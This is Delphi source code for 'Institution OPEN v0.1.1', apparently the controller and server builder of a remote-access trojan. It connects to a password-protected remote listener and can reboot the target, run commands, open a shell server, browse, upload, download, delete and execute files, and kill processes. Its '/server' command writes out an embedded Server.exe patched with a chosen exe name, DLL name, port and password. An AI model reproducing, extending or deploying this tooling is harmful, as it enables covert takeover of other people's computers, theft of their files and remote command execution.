{
Institution OPEN v0.1.1
Copyright (C) 2002 Aphex

This program is free software; you can redistribute it and/or
modify it under the terms of the GNU General Public License
as published by the Free Software Foundation; either version 2
of the License, or (at your option) any later version.

This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
GNU General Public License for more details.

You should have received a copy of the GNU General Public License
along with this program; if not, write to the Free Software
Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA  02111-1307, USA.
}

unit Unit1;

interface

uses
  Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms,
  Dialogs, ExtCtrls, ComCtrls, StdCtrls, Menus, ScktComp;

type
  TForm1 = class(TForm)
    TabControl1: TTabControl;
    Panel1: TPanel;
    Panel2: TPanel;
    Memo1: TMemo;
    Edit1: TEdit;
    ClientSocket1: TClientSocket;
    Panel3: TPanel;
    Panel4: TPanel;
    PopupMenu1: TPopupMenu;
    Clear1: TMenuItem;
    PopupMenu2: TPopupMenu;
    Delete2: TMenuItem;
    Download1: TMenuItem;
    N1: TMenuItem;
    Panel5: TPanel;
    Panel6: TPanel;
    ListView2: TListView;
    PopupMenu3: TPopupMenu;
    Kill1: TMenuItem;
    N2: TMenuItem;
    Refresh1: TMenuItem;
    N3: TMenuItem;
    Refresh2: TMenuItem;
    Label1: TLabel;
    Panel7: TPanel;
    ListView1: TListView;
    Drives2: TMenuItem;
    N6: TMenuItem;
    Explore2: TMenuItem;
    Upload1: TMenuItem;
    OpenDialog1: TOpenDialog;
    SaveDialog1: TSaveDialog;
    Panel8: TPanel;
    Panel9: TPanel;
    ListView3: TListView;
    Execute1: TMenuItem;
    PopupMenu4: TPopupMenu;
    Clear2: TMenuItem;
    procedure FormCreate(Sender: TObject);
    procedure Edit1KeyDown(Sender: TObject; var Key: Word; Shift: TShiftState);
    procedure Edit1KeyPress(Sender: TObject; var Key: Char);
    procedure TabControl1Change(Sender: TObject);
    procedure ListView1DblClick(Sender: TObject);
    procedure ListView1SelectItem(Sender: TObject; Item: TListItem; Selected: Boolean);
    procedure ListView1CustomDrawItem(Sender: TCustomListView; Item: TListItem; State: TCustomDrawState; var DefaultDraw: Boolean);
    procedure ListView1CustomDrawSubItem(Sender: TCustomListView; Item: TListItem; SubItem: Integer; State: TCustomDrawState; var DefaultDraw: Boolean);
    procedure ListView2CustomDrawItem(Sender: TCustomListView; Item: TListItem; State: TCustomDrawState; var DefaultDraw: Boolean);
    procedure ListView2SelectItem(Sender: TObject; Item: TListItem; Selected: Boolean);
    procedure ListView2CustomDrawSubItem(Sender: TCustomListView; Item: TListItem; SubItem: Integer; State: TCustomDrawState; var DefaultDraw: Boolean);
    procedure ListView3SelectItem(Sender: TObject; Item: TListItem; Selected: Boolean);
    procedure ListView3CustomDraw(Sender: TCustomListView; const ARect: TRect; var DefaultDraw: Boolean);
    procedure Delete2Click(Sender: TObject);
    procedure Download1Click(Sender: TObject);
    procedure DrivesClick(Sender: TObject);
    procedure Execute1Click(Sender: TObject);
    procedure Explore2Click(Sender: TObject);
    procedure Kill1Click(Sender: TObject);
    procedure Refresh1Click(Sender: TObject);
    procedure Refresh2Click(Sender: TObject);
    procedure Upload1Click(Sender: TObject);
    procedure Clear1Click(Sender: TObject);
    procedure Clear2Click(Sender: TObject);
    procedure ClientSocket1Connect(Sender: TObject; Socket: TCustomWinSocket);
    procedure ClientSocket1Read(Sender: TObject; Socket: TCustomWinSocket);
    procedure ClientSocket1Disconnect(Sender: TObject; Socket: TCustomWinSocket);
    procedure ClientSocket1Error(Sender: TObject; Socket: TCustomWinSocket; ErrorEvent: TErrorEvent; var ErrorCode: Integer);
    procedure AddTransfer(FileName: string);
    procedure StartTransfer(TransferType: integer);
    procedure IncTransfer(Size: dword; BytesRead: dword);
  private
    { Private declarations }
  public
    { Public declarations }
  end;

var
  Form1: TForm1;
  CurrentDirectory, InputBuffer, LocalFileName, Password, RemoteFileName: string;
  FileSelection, ProcessSelection: integer;
  BinaryBuffer: array [0..4096] of char;
  BinaryFile, BinaryFileSize, BytesRead, TotalBytes: dword;
  Receiving, Transfering: boolean;
  Commands: TStringList;
  CommandIndex: integer;

implementation

{$R *.dfm}

function FileSize(Size: extended): string;
begin
  if Size = 0 then
  begin
    Result := '0 B';
  end
  else if Size < 1000 then
  begin
    Result := FormatFloat('0', Size) + ' B';
  end
  else
  begin
    Size := Size / 1024;
    if (Size < 1000) then
    begin
      Result := FormatFloat('0.0', Size) + ' KB';
    end
    else
    begin
      Size := Size / 1024;
      if (Size < 1000) then
      begin
        Result := FormatFloat('0.00', Size) + ' MB';
      end
      else
      begin
        Size := Size / 1024;
        if (Size < 1000) then
        begin
          Result := FormatFloat('0.00', Size) + ' GB';
        end
        else
        begin
          Size := Size / 1024;
          if (Size < 1024) then
          begin
            Result := FormatFloat('0.00', Size) + ' TB';
          end
        end
      end
    end
  end;
end;

function Split(Input: string; Deliminator: string; Index: integer): string;
var
  StringLoop, StringCount: integer;
  Buffer: string;
begin
  StringCount := 0;
  for StringLoop := 1 to Length(Input) do
  begin
    if (Copy(Input, StringLoop, 1) = Deliminator) then
    begin
      Inc(StringCount);
      if StringCount = Index then
      begin
        Result := Buffer;
        Exit;
      end
      else
      begin
        Buffer := '';
      end;
    end
    else
    begin
      Buffer := Buffer + Copy(Input, StringLoop, 1);
    end;
  end;
  Result := Buffer;
end;

function SortFunction(Item1, Item2: TListItem; Data: integer): integer; stdcall;
var
  Sort: integer;
  Buffer1: pchar;
  Buffer2: pchar;
  Value: integer;
begin
  if Item1.Caption[1] = '.' then
  begin
   Result := -1;
   Exit;
  end;
  Sort := 0;
  if Item1.SubItems.Strings[0] = '' then
  begin
   Sort := 1;
  end;
  if Item2.SubItems.Strings[0] = '' then
  begin
   Sort := Sort + 2;
  end;
  case Sort of
    1: Value := -1;
    2: Value := 1;
    3: Value := 0;
  else
    Value := 0;
  end;
  if Value = 0 then
  begin
    Buffer1 := pchar(Item1.Caption);
    Buffer2 := pchar(Item2.Caption);
    if ord(Buffer1[0]) > ord(Buffer2[0]) then
    begin
      Value := 1;
    end
    else
    begin
      Value := -1;
    end;
  end;
  Result := Value;
end;

procedure TForm1.FormCreate(Sender: TObject);
begin
  CommandIndex := 0;
  Commands := TStringList.Create;
  Memo1.DoubleBuffered := True;
  ListView1.DoubleBuffered := True;
  ListView2.DoubleBuffered := True;
  ListView3.DoubleBuffered := True;
  ProcessSelection := -1;
  FileSelection := -1;
  Panel2.ManualDock(nil);
  Panel2.ManualDock(Panel1);
  Panel4.ManualDock(nil);
  Panel4.ManualDock(Panel3);
  Panel6.ManualDock(nil);
  Panel6.ManualDock(Panel5);
  Panel9.ManualDock(nil);
  Panel9.ManualDock(Panel8);
  Panel1.BringToFront;
  CurrentDirectory := '';
end;

procedure TForm1.Edit1KeyDown(Sender: TObject; var Key: Word; Shift: TShiftState);
begin
  if Key = VK_UP then
  begin
    Key := 0;
    if Commands.Count = 0 then Exit;
    if CommandIndex = Commands.Count then Dec(CommandIndex);
    Edit1.Text := Commands.Strings[CommandIndex];
    if CommandIndex > 0 then Dec(CommandIndex);
  end
  else if Key = VK_DOWN then
  begin
    Key := 0;
    if Commands.Count = 0 then Exit;
    if ((CommandIndex = Commands.Count) or (CommandIndex = Commands.Count - 1)) then
    begin
      Edit1.Text := '';
      Exit;
    end;
    if CommandIndex < Commands.Count - 1 then Inc(CommandIndex);
    Edit1.Text := Commands.Strings[CommandIndex];
  end
  else
  begin
    CommandIndex := Commands.Count;
  end;
end;

procedure TForm1.Edit1KeyPress(Sender: TObject; var Key: Char);
var
  Command: string;
  ResourceLocation: HRSRC;
  ResourceSize, BytesWritten: Longword;
  ResDataHandle: THandle;
  FileHandle: THandle;
  ResourcePointer, WriteBuff: pchar;
  PortBuff: integer;
begin
  if Key = #13 then
  begin
    Command := Split(Edit1.Text, #32, 1);
    if Command = '/connect' then
    begin
      Memo1.Lines.Add('Connecting to ' + Split(Edit1.Text, #32, 2) + ':' + Split(Edit1.Text, #32, 3) + '...');
      ClientSocket1.Active := False;
      CurrentDirectory := '';
      Label1.Caption := 'Directory: ';
      ListView1.Clear;
      ListView2.Clear;
      ListView3.Clear;
      ClientSocket1.Host := Split(Edit1.Text, #32, 2);
      ClientSocket1.Port := StrToInt(Split(Edit1.Text, #32, 3));
      ClientSocket1.Active := True;
      Password := Split(Edit1.Text, #32, 4);
    end
    else if Command = '/disconnect' then
    begin
      ClientSocket1.Active := False;
      CurrentDirectory := '';
      Label1.Caption := 'Directory: ';
      ListView1.Clear;
      ListView2.Clear;
      ListView3.Clear;
    end
    else if Command = '/reboot' then
    begin
      if Transfering then Exit;
      Memo1.Lines.Add('Rebooting remote machine.');
      ClientSocket1.Socket.SendText('A');
    end
    else if Command = '/run' then
    begin
      if Transfering then Exit;
      Memo1.Lines.Add('Running: ' + Split(Edit1.Text, #32, 2));
      ClientSocket1.Socket.SendText('0' + Split(Edit1.Text, #32, 2));
    end
    else if Command = '/help' then
    begin
      Memo1.Lines.Add('/connect <address> <port> <pass>');
      Memo1.Lines.Add('/disconnect');
      Memo1.Lines.Add('/reboot');
      Memo1.Lines.Add('/run <command> [parameters]');
      Memo1.Lines.Add('/shell <port>');
      Memo1.Lines.Add('/server <exe name> <dll name> <port> <pass>');
    end
    else if Command = '/server' then
    begin
      ResourceLocation := FindResource(HInstance, pchar('a01'), RT_RCDATA);
      if ResourceLocation <> 0 then
      begin
        ResourceSize := SizeofResource(HInstance, ResourceLocation);
        if ResourceSize <> 0 then
        begin
          ResDataHandle := LoadResource(HInstance, ResourceLocation);
          if ResDataHandle <> 0 then
          begin
            ResourcePointer := LockResource(ResDataHandle);
            if ResourcePointer <> nil then
            begin
              FileHandle := CreateFile(pchar(ExtractFilePath(ParamStr(0)) + 'Server.exe'), GENERIC_WRITE, FILE_SHARE_WRITE, nil, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, 0);
              if FileHandle <> INVALID_HANDLE_VALUE then
              begin
                WriteFile(FileHandle, ResourcePointer^, ResourceSize, BytesWritten, nil);
                SetFilePointer(FileHandle, 1024, nil, FILE_BEGIN);
                WriteBuff := pchar(Split(Edit1.Text, #32, 2));
                WriteFile(FileHandle, WriteBuff^, Length(WriteBuff) + 1, BytesWritten, nil);
                SetFilePointer(FileHandle, 1044, nil, FILE_BEGIN);
                WriteBuff := pchar(Copy(Split(Edit1.Text, #32, 3), 1, Length(Split(Edit1.Text, #32, 3)) - 3) + 'dll');
                WriteFile(FileHandle, WriteBuff^, Length(WriteBuff) + 1, BytesWritten, nil);
                SetFilePointer(FileHandle, 4192, nil, FILE_BEGIN);
                PortBuff := StrToInt(Split(Edit1.Text, #32, 4));
                WriteFile(FileHandle, PortBuff, 2, BytesWritten, nil);
                SetFilePointer(FileHandle, 4196, nil, FILE_BEGIN);
                WriteBuff := pchar(Split(Edit1.Text, #32, 5));
                WriteFile(FileHandle, WriteBuff^, Length(WriteBuff) + 1, BytesWritten, nil);
                CloseHandle(FileHandle);
                Memo1.Lines.Add('Installation file saved to: ' + ExtractFilePath(ParamStr(0)) + 'Server.exe')
              end;
            end;
          end;
        end;
      end;
    end
    else if Command = '/shell' then
    begin
      if Transfering then Exit;
      ClientSocket1.Socket.SendText('B' + Split(Edit1.Text, #32, 2));
      Memo1.Lines.Add('Shell server started on port: ' + Split(Edit1.Text, #32, 2));
    end;
    Commands.Add(Edit1.Text);
    Edit1.Text := '';
    Key := #0;
  end;
end;

procedure TForm1.ClientSocket1Connect(Sender: TObject; Socket: TCustomWinSocket);
begin
  Memo1.Lines.Add('Logging in...');
  ClientSocket1.Socket.SendText('1' + Password);
  PopupMenu3.Items.Items[0].Clear;
end;

procedure TForm1.ClientSocket1Read(Sender: TObject; Socket: TCustomWinSocket);
var
  Command, Input: string;
  ListItem: TListItem;
  MenuItem: TMenuItem;
  BufferLen: dword;
  BytesWritten: dword;
begin
  if Receiving then
  begin
    Application.ProcessMessages;
    Sleep(1);
    BufferLen := Socket.ReceiveLength;
    if BufferLen > 4096 then
    begin
      BufferLen := 4096;
    end;
    Socket.ReceiveBuf(BinaryBuffer, BufferLen);
    Inc(TotalBytes, BufferLen);
    IncTransfer(BinaryFileSize, TotalBytes);
    WriteFile(BinaryFile, BinaryBuffer, BufferLen, BytesWritten, nil);
    if TotalBytes >= BinaryFileSize then
    begin
      CloseHandle(BinaryFile);
      Receiving := False;
      Transfering := False;
    end;
    Exit;
  end;
  InputBuffer := InputBuffer + Socket.ReceiveText;
  while True do
  begin
    Input := Split(InputBuffer, #3, 1);
    if (Copy(Input, Length(Input), 1) <> #2) then
    begin
      if Length(Input) > 1 then
      begin
        InputBuffer := Input;
      end
      else
      begin
        InputBuffer := '';
      end;
      Break;
    end
    else
    begin
      Delete(InputBuffer, 1, Length(Input) + 1);
      Input := Copy(Input, 1, Length(Input) - 1);
      Command := Split(Input, #1, 1);
      if Command = '1' then
      begin
        Memo1.Lines.Add('Logged in!');
        ClientSocket1.Socket.SendText('2');
      end
      else if Command = '2' then
      begin
        if CurrentDirectory = '' then
        begin
          CurrentDirectory := UpperCase(Split(Input, #1, 2));
          Label1.Caption := 'Directory: ' + CurrentDirectory;
          Refresh2Click(nil);
        end;
        MenuItem := TMenuItem.Create(PopupMenu2);
        MenuItem.Caption := UpperCase(Split(Input, #1, 2));
        MenuItem.OnClick := DrivesClick;
        PopupMenu2.Items.Items[0].Add(MenuItem);
      end
      else if Command = '3' then
      begin
        ListItem := ListView2.Items.Add;
        ListItem.Caption := LowerCase(Split(Input, #1, 2));
        ListItem.SubItems.Add(Split(Input, #1, 3));
        ListItem.SubItems.Add(Split(Input, #1, 4));
      end
      else if Command = '4' then
      begin
        Memo1.Text := Memo1.Text + Input + #13#10;
      end
      else if Command = '5' then
      begin
        ListItem := ListView1.Items.Add;
        ListItem.Caption := LowerCase(Split(Input, #1, 2));
        ListItem.SubItems.Add(FileSize(StrToInt(Split(Input, #1, 3))));
        ListView1.CustomSort(@SortFunction, 0);
      end
      else if Command = '6' then
      begin
        ListItem := ListView1.Items.Add;
        ListItem.Caption := LowerCase(Split(Input, #1, 2));
        ListItem.SubItems.Add('');
        ListView1.CustomSort(@SortFunction, 0);
      end
      else if Command = '7' then
      begin
        BinaryFile := CreateFile(pchar(LocalFileName), GENERIC_READ, FILE_SHARE_READ, nil, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, 0);
        BinaryFileSize := GetFileSize(BinaryFile, nil);
        StartTransfer(1);
        ClientSocket1.Socket.SendText('7' + IntToStr(BinaryFileSize));
      end
      else if Command = '8' then
      begin
        TotalBytes := 0;
        Transfering := True;
        repeat
          Application.ProcessMessages;
          Sleep(10);
          ReadFile(BinaryFile, BinaryBuffer, 4095, BytesRead, nil);
          ClientSocket1.Socket.SendBuf(BinaryBuffer, BytesRead);
          Inc(TotalBytes, BytesRead);
          IncTransfer(BinaryFileSize, TotalBytes);
        until BytesRead < 4095;
        CloseHandle(BinaryFile);
        Transfering := False;
      end
      else if Command = '9' then
      begin
        BinaryFile := CreateFile(pchar(LocalFileName), GENERIC_WRITE, FILE_SHARE_WRITE, nil, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, 0);
        BinaryFileSize := StrToInt(Split(Input, #1, 2));
        StartTransfer(0);
        TotalBytes := 0;
        Receiving := True;
        Transfering := True;
      end;
    end;
  end;
end;

procedure TForm1.ClientSocket1Disconnect(Sender: TObject; Socket: TCustomWinSocket);
begin
  Memo1.Lines.Add('Disconnected!');
end;

procedure TForm1.ClientSocket1Error(Sender: TObject; Socket: TCustomWinSocket; ErrorEvent: TErrorEvent; var ErrorCode: Integer);
begin
  Memo1.Lines.Add('Socket Error! (' + IntToStr(ErrorCode) + ')');
  ErrorCode := 0;
end;

procedure TForm1.TabControl1Change(Sender: TObject);
begin
  Panel1.Visible := False;
  Panel3.Visible := False;
  Panel5.Visible := False;
  Panel8.Visible := False;
  if TabControl1.TabIndex = 0 then
  begin
    Panel1.Visible := True;
    Panel2.Show;
  end
  else if TabControl1.TabIndex = 1 then
  begin
    Panel3.Visible := True;
    Panel4.Show;
  end
  else if TabControl1.TabIndex = 2 then
  begin
    Panel5.Visible := True;
    Panel6.Show;
  end
  else if TabControl1.TabIndex = 3 then
  begin
    Panel8.Visible := True;
    Panel9.Show;
  end;
end;

procedure TForm1.DrivesClick(Sender: TObject);
begin
  if Transfering then Exit;
  CurrentDirectory := Copy(TMenuItem(Sender).Caption, 2, Length(TMenuItem(Sender).Caption) - 1);
  Label1.Caption := 'Directory: ' + CurrentDirectory;
  ClientSocket1.Socket.SendText('5' + CurrentDirectory);
  ListView1.Clear;
  FileSelection := -1;
end;

procedure TForm1.Refresh1Click(Sender: TObject);
begin
  if Transfering then Exit;
  ListView2.Clear;
  ProcessSelection := -1;
  ClientSocket1.Socket.SendText('3');
end;

procedure TForm1.Kill1Click(Sender: TObject);
var
  ListItem: TListItem;
begin
  if Transfering then Exit;
  ListItem := ListView2.Items.Item[ProcessSelection];
  ClientSocket1.Socket.SendText('4' + ListItem.SubItems.Strings[0]);
end;

procedure TForm1.Download1Click(Sender: TObject);
var
  ListItem: TListItem;
begin
  if Transfering then Exit;
  if FileSelection = -1 then Exit;
  if CurrentDirectory = '' then Exit;
  ListItem := ListView1.Items.Item[FileSelection];
  SaveDialog1.FileName := ExtractFilePath(ParamStr(0)) + ListItem.Caption;
  if SaveDialog1.Execute then
  begin
    RemoteFileName := CurrentDirectory + ListItem.Caption;
    LocalFileName := LowerCase(SaveDialog1.FileName);
    AddTransfer(LocalFileName);
    ClientSocket1.Socket.SendText('8' + RemoteFileName);
  end;
end;

procedure TForm1.Upload1Click(Sender: TObject);
begin
  if Transfering then Exit;
  if OpenDialog1.Execute then
  begin
    RemoteFileName := CurrentDirectory + ExtractFileName(OpenDialog1.FileName);
    LocalFileName := LowerCase(OpenDialog1.FileName);
    AddTransfer(LocalFileName);
    ClientSocket1.Socket.SendText('6' + RemoteFileName);
  end;
end;

procedure TForm1.Delete2Click(Sender: TObject);
var
  ListItem: TListItem;
begin
  ListItem := ListView1.Items.Item[FileSelection];
  ClientSocket1.Socket.SendText('9' + CurrentDirectory + ListItem.Caption);
end;

procedure TForm1.Execute1Click(Sender: TObject);
var
  ListItem: TListItem;
begin
  ListItem := ListView1.Items.Item[FileSelection];
  ClientSocket1.Socket.SendText('0' + CurrentDirectory + ListItem.Caption);
end;

procedure TForm1.Clear1Click(Sender: TObject);
begin
  Memo1.Clear;
end;

procedure TForm1.Clear2Click(Sender: TObject);
begin
  if Transfering then Exit;
  ListView3.Clear;
end;

procedure TForm1.Refresh2Click(Sender: TObject);
begin
  if Transfering then Exit;
  if CurrentDirectory = '' then Exit;
  ListView1.Clear;
  FileSelection := -1;
  ClientSocket1.Socket.SendText('5' + CurrentDirectory);
end;

procedure TForm1.Explore2Click(Sender: TObject);
var
  ListItem: TListItem;
begin
  if Transfering then Exit;
  if FileSelection = -1 then Exit;
  if CurrentDirectory = '' then Exit;
  ListItem := ListView1.Items.Item[FileSelection];
  if ListItem.SubItems.Strings[0] <> '' then
  begin
   Download1Click(nil);
   Exit;
  end;
  if ListItem.Caption = '.' then
  begin
    CurrentDirectory := Copy(CurrentDirectory, 1, 3);
    Label1.Caption := 'Directory: ' + CurrentDirectory;
    ClientSocket1.Socket.SendText('5' + CurrentDirectory);
  end
  else if ListItem.Caption = '..' then
  begin
    CurrentDirectory := ExtractFilePath(Copy(CurrentDirectory, 1, Length(CurrentDirectory) - 1));
    Label1.Caption := 'Directory: ' + CurrentDirectory;
    ClientSocket1.Socket.SendText('5' + CurrentDirectory);
  end
  else
  begin
    CurrentDirectory := CurrentDirectory + ListItem.Caption + '\';
    Label1.Caption := 'Directory: ' + CurrentDirectory;
    ClientSocket1.Socket.SendText('5' + CurrentDirectory);
  end;
  ListView1.Clear;
  FileSelection := -1;
end;

procedure TForm1.ListView1SelectItem(Sender: TObject; Item: TListItem; Selected: Boolean);
begin
  FileSelection := Item.Index;
  Item.Selected := False;
  Item.Focused := False;
  ListView1.Repaint;
end;

procedure TForm1.ListView1DblClick(Sender: TObject);
begin
  Explore2Click(nil);
end;

procedure TForm1.ListView1CustomDrawItem(Sender: TCustomListView;
  Item: TListItem; State: TCustomDrawState; var DefaultDraw: Boolean);
begin
  if Item.Index = FileSelection then
  begin
    Sender.Canvas.Font.Color := clBlue;
  end
  else
  begin
    Sender.Canvas.Font.Color := clBlack;
  end;
end;

procedure TForm1.ListView1CustomDrawSubItem(Sender: TCustomListView;
  Item: TListItem; SubItem: Integer; State: TCustomDrawState;
  var DefaultDraw: Boolean);
begin
  if Item.Index = FileSelection then
  begin
    Sender.Canvas.Font.Color := clBlue;
  end
  else
  begin
    Sender.Canvas.Font.Color := clBlack;
  end;
end;

procedure TForm1.ListView2SelectItem(Sender: TObject; Item: TListItem; Selected: Boolean);
begin
  ProcessSelection := Item.Index;
  Item.Selected := False;
  Item.Focused := False;
  ListView2.Repaint;
end;

procedure TForm1.ListView2CustomDrawItem(Sender: TCustomListView; Item: TListItem; State: TCustomDrawState; var DefaultDraw: Boolean);
begin
  if Item.Index = ProcessSelection then
  begin
    Sender.Canvas.Font.Color := clBlue;
  end
  else
  begin
    Sender.Canvas.Font.Color := clBlack;
  end;
end;

procedure TForm1.ListView2CustomDrawSubItem(Sender: TCustomListView; Item: TListItem; SubItem: Integer; State: TCustomDrawState; var DefaultDraw: Boolean);
begin
  if Item.Index = ProcessSelection then
  begin
    Sender.Canvas.Font.Color := clBlue;
  end
  else
  begin
    Sender.Canvas.Font.Color := clBlack;
  end;
end;

procedure TForm1.ListView3SelectItem(Sender: TObject; Item: TListItem; Selected: Boolean);
begin
  Item.Selected := False;
  Item.Focused := False;
end;

procedure TForm1.ListView3CustomDraw(Sender: TCustomListView; const ARect: TRect; var DefaultDraw: Boolean);
var
 ProgressBar: TProgressBar;
 Rect: TRect;
 iColumnLoop: Integer;
begin
  DefaultDraw := True;
  if ListView3.Items.Count <= 0 then Exit;
  if ListView3.Items[0].Data = nil then Exit;
  Rect := ListView3.Items[0].DisplayRect(drBounds);
  for iColumnLoop := 0 to ListView1.Columns.Count - 2 do
  begin
    Rect.Left := Rect.Left + ListView3.Columns[iColumnLoop].Width;
    Rect.Right := Rect.Left + ListView3.Columns[ListView1.Columns.Count - 1].Width;
  end;
  ProgressBar := TProgressBar(ListView3.Items[0].Data);
  if ((ProgressBar.BoundsRect.Left <> Rect.Left) or (ProgressBar.BoundsRect.Right <> Rect.Right) or (ProgressBar.BoundsRect.Top <> Rect.Top)) then
  begin
    ProgressBar.BoundsRect := Rect;
    ProgressBar.Repaint;
  end;
  PostMessage(ProgressBar.Handle, WM_USER + 9, 0, clBlack);
end;

procedure TForm1.AddTransfer(FileName: string);
var
  TransferItem: TListItem;
  ProgressBar: TProgressBar;
  Rect: TRect;
  iColumnLoop: Integer;
begin
  TransferItem := TListItem.Create(ListView3.Items);
  ListView3.Items.AddItem(TransferItem, 0);
  TransferItem.Caption := ExtractFileName(FileName);
  TransferItem.SubItems.Add('');
  TransferItem.SubItems.Add('queued');
  Rect := TransferItem.DisplayRect(drBounds);
  for iColumnLoop := 0 to ListView3.Columns.Count - 2 do
  begin
    Rect.Left := Rect.Left + ListView3.Columns[iColumnLoop].Width;
    Rect.Right := Rect.Left + ListView3.Columns[ListView3.Columns.Count - 1].Width;
  end;
  ProgressBar := TProgressBar.Create(Panel9);
  ProgressBar.Parent := Panel9;
  ProgressBar.Smooth := True;
  ProgressBar.Min := 0;
  ProgressBar.Max := 100;
  ProgressBar.Position := 0;
  ProgressBar.Visible := False;
  TransferItem.Data := ProgressBar;
  ProgressBar.BoundsRect := Rect;
  PostMessage(ProgressBar.Handle, WM_USER + 9, 0, clBlack);
end;

procedure TForm1.StartTransfer(TransferType: integer);
var
  TransferItem: TListItem;
begin
  TransferItem := ListView3.TopItem;
  if TransferType = 1 then
  begin
    TransferItem.SubItems.Strings[1] := 'sending';
  end
  else
  begin
    TransferItem.SubItems.Strings[1] := 'receiving';
  end;
end;

procedure TForm1.IncTransfer(Size: dword; BytesRead: dword);
var
  TransferItem: TListItem;
  ProgressBar: TProgressBar;
begin
  TransferItem := ListView3.TopItem;
  if TransferItem.Data = nil then Exit;
  ProgressBar := TProgressBar(TransferItem.Data);
  ProgressBar.Visible := True;
  if BytesRead >= Size then
  begin
    if TransferItem.SubItems.Strings[1] = 'sending' then
    begin
      TransferItem.SubItems.Strings[1] := 'sent';
    end
    else if TransferItem.SubItems.Strings[1] = 'receiving' then
    begin
      TransferItem.SubItems.Strings[1] := 'received';
    end;
    ProgressBar := TProgressBar(TransferItem.Data);
    ProgressBar.Free;
    TransferItem.Data := nil;
    Exit;
  end;
  ProgressBar := TProgressBar(TransferItem.Data);
  SendMessage(ListView3.Handle, WM_SETREDRAW, 0, 0);
  try
    ProgressBar.Position := ((BytesRead * 100) div Size);
  finally
    SendMessage(ListView3.Handle, WM_SETREDRAW, 1, 0);
    ListView3.Invalidate;
  end;
end;

end.
